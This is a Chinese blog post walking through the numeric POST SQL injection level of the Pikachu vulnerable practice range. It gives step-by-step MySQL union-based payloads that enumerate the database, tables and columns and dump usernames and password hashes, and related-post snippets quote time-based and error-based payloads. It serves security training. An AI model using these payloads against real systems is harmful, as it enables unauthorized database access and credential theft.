【pikachu-SQL】数字型注入(post)2022,超详细

已于 2022-09-12 19:49:25 修改
阅读量1.5k 收藏 18
点赞数 5
文章标签: 数据库 mysql
于 2022-09-10 18:54:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46497491/article/details/126798494
版权

本人小菜鸡一枚,根据日常学习整理一些内容,希望大佬莫喷,如有错误,欢迎指正,感谢感谢!!!

数字型注入(post)

1、没有输入框,所以抓包修改

 

判断是否有注入:id=2 and 1=1页面返回正常

id=2 and 1=2 页面报错,存在注入

2、根据返回内容,可判断可能有两个注入点,通过order by语句判断是否正确

 

返回正常

 

报错,可以判断为两列

3、尝试union联合来确定注入点

id = 2 union select 99,98

 

4、开始爆数据库

id = 2 union select 99,database()

 

数据库名称:pikachu

5、根据pikachu,爆表名,union联合查询需要借助information_schema数据库,来查询当前数据库信息,information_schema是mysql自带的数据库

id=2 union select 99,table_name from information_schema.tables where table_schema = 'pikachu'

可以看到存在一个users表,猜测用户、密码放在里面

6、根据users表,爆列名

union select 99,column_name from information_schema.columns where table_name='users'

可以看出存在user、password列

7、最后一步,根据表,爆数据

union select username,password from users

密码是md5加密,通过在线解密就可以

L_ergo
关注
  • 5
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入 pikachu post数字型注入
08-12
sql注入 pikachu post数字型注入
sql注入数字型注入
08-02
SQL 注入数字型注入 SQL 注入数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
pikachu靶场练习——数字型注入
tyelixy的博客
08-09 1329
burpsuite未安装完成,不涉及抓包相关内容 前置内容 由于网页的生成有时需要用到用户输入的信息,再根据用户输入到数据库中查找相关内容,所以网页中会含有sql语句。针对sql语句,可以进行sql注入。 如: $sql="SELECT * FROM news WHERE id={$id}"; 这样的语句可以进行数字型注入。 题目实战 打开靶场,选择sql数字型注入题,出现以下页面。 下拉栏中有选项 ---以及数字1~6。 选择数字一先发送个请求试试: 可以看到发送的表单中id:1 然后发现可以在检.
Pikachu数字型注入、字符型注入通关详解
小小小屿屿屿的博客
11-16 488
pikachu是一个漏洞练习平台,里面包含了大部分常见的Web漏洞,非常适合新手去联系,本文将详细讲述Pikachu靶场中的数字型注入、字符型注入这2关的攻略。
pikachu靶场第十六关——sqli数字型注入post)(附代码审计)
最新发布
yzasts的博客
04-15 1066
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
Pikachusql数字型注入
m0_63152656的博客
09-24 415
pikachusql数字型注入 及 终端打开小皮数据库
pikachu-sql注入
Resets_的博客
04-01 530
pikachu sql数字型注入,字符型注入
pikachu-SQL注入
qq_43660551的博客
05-11 1303
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
pikachu-master.zip
06-25
Pikachu,这是一个综合类型的靶场练习环境,覆盖了较为全面的漏洞练习,在掌握漏洞原理后,可以通过该靶场来进一步强化自己的知识技能。
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
pikachu-master
05-04
pikachu漏洞测试平台搭建
SQL注入漏洞攻防攻略大全
12-30
SQL注入漏洞攻防攻略大全 目录 SQL注入漏洞攻防攻略大全 1 (一) SQL注入漏洞全接触--入门篇 1 (二) SQL注入法攻击一日通 9 (三) SQL Server应用程序中的高级SQL注入 19 (四) 跨站式SQL注入技巧 25 (五) 编写通用的ASP防SQL注入攻击程序 28 (六) SQL注入攻击的原理及其防范措施 30 (七) 利用instr()函数防止SQL注入攻击 34
SQL注入原理-数值型注入
T1ngSh0w的博客
09-12 1488
SQL注入原理-数值型注入
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2731
sql注入
DVWA之sql注入——联合注入和报错注入
Williamanddog的博客
12-20 1771
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
SQL注入pikachu靶场)(mysql数据库数字型注入
weixin_54431413的博客
03-05 712
1.数字型注入 点击查询(submit),用burpsuite抓取请求(request)包 order by 判断有几列 union select 1,2 判断回显 然后利用mysql高版本中的默认库(information_schema)进行所有的数据库名查询 union select 1,schema_name from information_schema.schemata 根据得到的数据库名查询数据库下的表名 union select 1,table_name from .
pikachu靶场之SQL注入
热门推荐
0nc3的博客
08-09 1万+
0x00 前言 手工注入忘的差不多了。。。还是需要多多练习 以下关卡都是稍微测以下存不存在sql注入,查下数据库名啥的 没有将所有字段都爆出来。 冲鸭~ 0x01 数字型注入(post) 因为是数字型,直接在后面加上真命题,不需要加单引号测试 0x02 字符型注入(get) 加单引号报错,说明存在sql注入 再加上真命题查询到all 0x03 搜索型注入 加单引号,sql语句报错 Paylo...
SQL手工注入——数字型注入
高毅的博客
07-01 2272
当输入的参数是整数时,若存在漏洞,则认为是数字型注入,如xxx.php?id=88形式。 这是最简单的一种注入。 测试过程一般如下: 1、对url:xxx.php?id=88后添加',形成xxx.php?id=88',观察页面是否出现异常。若系统没有做防护,则出现异常。 2、对url:xxx.php?id=88后添加and 1=1,能够正常执行,返回结果与原始请求无任何差异。 3、对ur
pikachu-数字型注入-(方法二)之BurpSute (pikachu数字型注入
wjwqp的专栏
03-01 548
pikachu-数字型注入-(方法一)之sqlmap (pikachu数字型注入) 另附 pikachu-数字型注入-(方法二)之BurpSute (pikachu数字型注入) 今天猴子君要和大家探讨的是SQL注入部分的数字型注入过程。 首先运行pikachu的测试环境,找到SQL-Inject章节的数字型注入post)。 先进行第一次试探,查看一下运行的原理。发现这是一个基于...
如何判断字符型和数字型注入
01-03
判断字符型和数字型注入的方法如下: 1. 字符型注入判断: - 在注入点处输入一个单引号('),如果页面报错或者显示异常,那么很可能存在字符型注入漏洞。 - 在注入点处输入一个闭合的单引号('),如果页面正常显示,那么很可能存在字符型注入漏洞。 - 在注入点处输入一个闭合的单引号(')加上一个错误的单引号('),如果页面报错或者显示异常,那么很可能存在字符型注入漏洞。 2. 数字型注入判断: - 在注入点处输入一个数字,如果页面正常显示,那么很可能存在数字型注入漏洞。 - 在注入点处输入一个数字加上一个错误的数字,如果页面报错或者显示异常,那么很可能存在数字型注入漏洞。 需要注意的是,以上方法只是初步判断是否存在注入漏洞,具体的注入攻击还需要进一步的测试和分析。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值